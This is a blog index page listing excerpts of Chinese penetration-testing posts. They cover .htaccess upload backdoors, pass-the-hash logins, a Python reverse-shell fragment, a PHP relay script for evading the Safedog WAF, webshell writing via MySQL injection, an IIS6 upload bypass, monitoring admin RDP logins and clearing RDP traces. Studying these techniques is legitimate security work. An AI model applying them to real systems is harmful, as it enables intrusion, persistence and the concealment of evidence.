会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
MSRC TOP100
悟已往之不谏,知来者之可追
首页
管理
上一页
1
···
4
5
6
7
8
9
10
11
12
···
18
下一页
2019年7月6日
Vulnhub靶场渗透练习(一) Breach1.0
摘要: 打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密 cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJH
阅读全文
posted @ 2019-07-06 21:00 紅人
阅读(1581)
评论(0)
推荐(0)
2019年7月1日
利用hash远程登陆系统
摘要: 有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录 我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统 1.利用抓哈希工具PwDump7.exe获取哈希 菜刀输入打开命令执行 PwDump7.exe>>1.
阅读全文
posted @ 2019-07-01 12:38 紅人
阅读(1267)
评论(0)
推荐(0)
2019年6月30日
.htaccess文件上传利用
摘要: 一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt写入 AddType application/x-httpd-php .png 打开另存为 保存类型为所有文件 上传.htaccess 必须是网站根路径 让png解析为php 2.留后门 可以在.htaccess 加入php解析规则
阅读全文
posted @ 2019-06-30 12:43 紅人
阅读(4790)
评论(0)
推荐(2)
2019年6月25日
利用python模拟菜刀反弹shell绕过限制
摘要: 有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK
阅读全文
posted @ 2019-06-25 10:34 紅人
阅读(902)
评论(0)
推荐(0)
2019年6月22日
python soket服务和客户端Demo
摘要: #服务端from socket import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',6666))#补丁端口 s.listen(1)#开始监听一个队列 sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号 print ('成功',addr)sock.send(str('dd').encode...
阅读全文
posted @ 2019-06-22 22:54 紅人
阅读(291)
评论(0)
推荐(0)
2019年6月16日
php中转菜刀脚本过狗免杀
摘要: <?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) { if(strstr($v,"base64_decode")) { $v=str_replace("base64_decode("
阅读全文
posted @ 2019-06-16 19:37 紅人
阅读(786)
评论(0)
推荐(0)
2019年6月13日
mysql 堆注入写shell
摘要: 如果一个平台有注入点的时候可以通过写一句话拿shell 条件 1.myql 5.6.34 版本区分 2.有写的权限 3.知道绝对路径 MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就
阅读全文
posted @ 2019-06-13 22:11 紅人
阅读(1569)
评论(0)
推荐(0)
2019年6月6日
sql注入100种姿势过waf(二):过安全狗
摘要: 仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6 1.首先判断是否有注入点包括是字符型还是数字型注入 我们假设他是数字型注入 构造 id=0=0 在
阅读全文
posted @ 2019-06-06 15:02 紅人
阅读(4266)
评论(2)
推荐(3)
sql注入100种姿势过waf(一):waf 了解
摘要: 仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 首先WAF(Web Application Firewall),俗称Web应用防火墙,主要的目的实际上是用来过滤不正常或者恶意请求包,以及为服务器打上临时补丁的作用。 1、云waf: 在配置云waf时(通常是CDN包含的waf),DN
阅读全文
posted @ 2019-06-06 10:14 紅人
阅读(2355)
评论(0)
推荐(2)
2019年6月5日
双文件上传突破利用
摘要: 这个漏洞在南方cms 上出现的 主要是上传时候利用bp抓包 然后鼠标右键吧数据包发送到Repeater模块 找到你上传的包内容 一般是 61234564788Content-Disposition: form-data; name="FileName"; filename=“1.png” 图片内容
阅读全文
posted @ 2019-06-05 13:50 紅人
阅读(520)
评论(0)
推荐(0)
渗透实例(一):点后缀突破上传文件
摘要: 目标系统 windows+php 1.字典爆破后台路径 2.后台弱口令爆破 3.进去后发现两个上传点 编辑器百度的 无版本漏洞 无法利用 有一个单独的备份模板上传 4.初次上传php后缀 被告知格式不允许 尝试其他后缀 .php5 .php1 之类的 都被禁止 1.png 可以 图片可以 图片名字被
阅读全文
posted @ 2019-06-05 13:11 紅人
阅读(874)
评论(0)
推荐(0)
2019年6月4日
IIS6.0使用冒号上传漏洞利用
摘要: 利用条件: 1.iis版本为6.0 2.上传文件名不会重命名 利用: 上传一个jpg木马图片 名字为:cs.asp:.jpg 注意是: 默认windows是不允许文件字含:(冒号)的 所以需要抓包后改下!! 上传成功后,iis会忽略掉:后面的字符,也就是成了cs.asp .但是在接收判断文件后缀还是
阅读全文
posted @ 2019-06-04 22:11 紅人
阅读(726)
评论(0)
推荐(0)
利用3389端口监视管理员登录
摘要: 这里要用到 可以在角色里面安装 终端服务配置 双击 选择环境 管理员进行3389登录时 执行1.bat 文件 也可以是一个恶意的exe bat 里面写 @echo offdate /t>>log.txt 获取日期time /t >>log.txt 获取时间netstat -n -p tcp |fin
阅读全文
posted @ 2019-06-04 19:30 紅人
阅读(447)
评论(0)
推荐(0)
Windows突破远程连接最大数去掉限制登录
摘要: 当对方设置最大连接数 超过限制时 可以用这个命令 win+r 输入 mstsc /v:192.168.18.131:3389 /console windows server 2003 sp2 以下的版本(包括) mstsc /v:192.168.18.131:3389 /admin windows
阅读全文
posted @ 2019-06-04 15:59 紅人
阅读(575)
评论(0)
推荐(0)
全面认识nslookup命令及子命令
摘要:
阅读全文
posted @ 2019-06-04 10:40 紅人
阅读(343)
评论(0)
推荐(0)
2019年6月3日
cmd 获取当前登录的用户和远程连接的用户
摘要: 打开cmd 执行 quser 可以看到我有两个 会话 带> 是我当前的会话 rdp 是远程连接的会话 console 是本机操作 可以知道谁在连接你 状态是 唱片 就是未连接的意思 证明有过两个会话连接
阅读全文
posted @ 2019-06-03 14:52 紅人
阅读(2712)
评论(0)
推荐(0)
发生系统错误 6118
摘要: 执行net view 回显的错误 打开cmd执行两条命令 net start Browsernet stop mpssvc 在执行net view 还是提示6118 退出重新打开cmd 再执行 net view 就可以了 还不行多输入几遍命令 可能有缓存情况 记得刷新服务列表 可以写成bat 处理
阅读全文
posted @ 2019-06-03 12:06 紅人
阅读(2031)
评论(0)
推荐(0)
Windows 批量修改文件后缀名
摘要: 利用ren 文件名替换命令 for循环去批处理 另存temp.bat 放到你要批量改名的文件家下 第一行 代表后面的命令只执行不显示命令 第二行 for 循环 %%m 批处理的自定义变量名 in(*) *代表当前文件任意文件 可以写成 *.doc 寻找后缀为doc 全部改成bat 后缀 第三行 不该
阅读全文
posted @ 2019-06-03 09:39 紅人
阅读(1281)
评论(0)
推荐(0)
2019年6月2日
dos命令创建批处理脚本
摘要: win+r 打开cmd 输入 copy con 1.bat 回车 进入编辑状态输入 @echo off echo xxxx Ctrl+z 结束编辑 会在当前目录生成一个bat文件
阅读全文
posted @ 2019-06-02 16:54 紅人
阅读(504)
评论(0)
推荐(0)
3389连接痕迹清除
摘要: 另存为bat 脚本
阅读全文
posted @ 2019-06-02 16:26 紅人
阅读(712)
评论(0)
推荐(0)
上一页
1
···
4
5
6
7
8
9
10
11
12
···
18
下一页
公告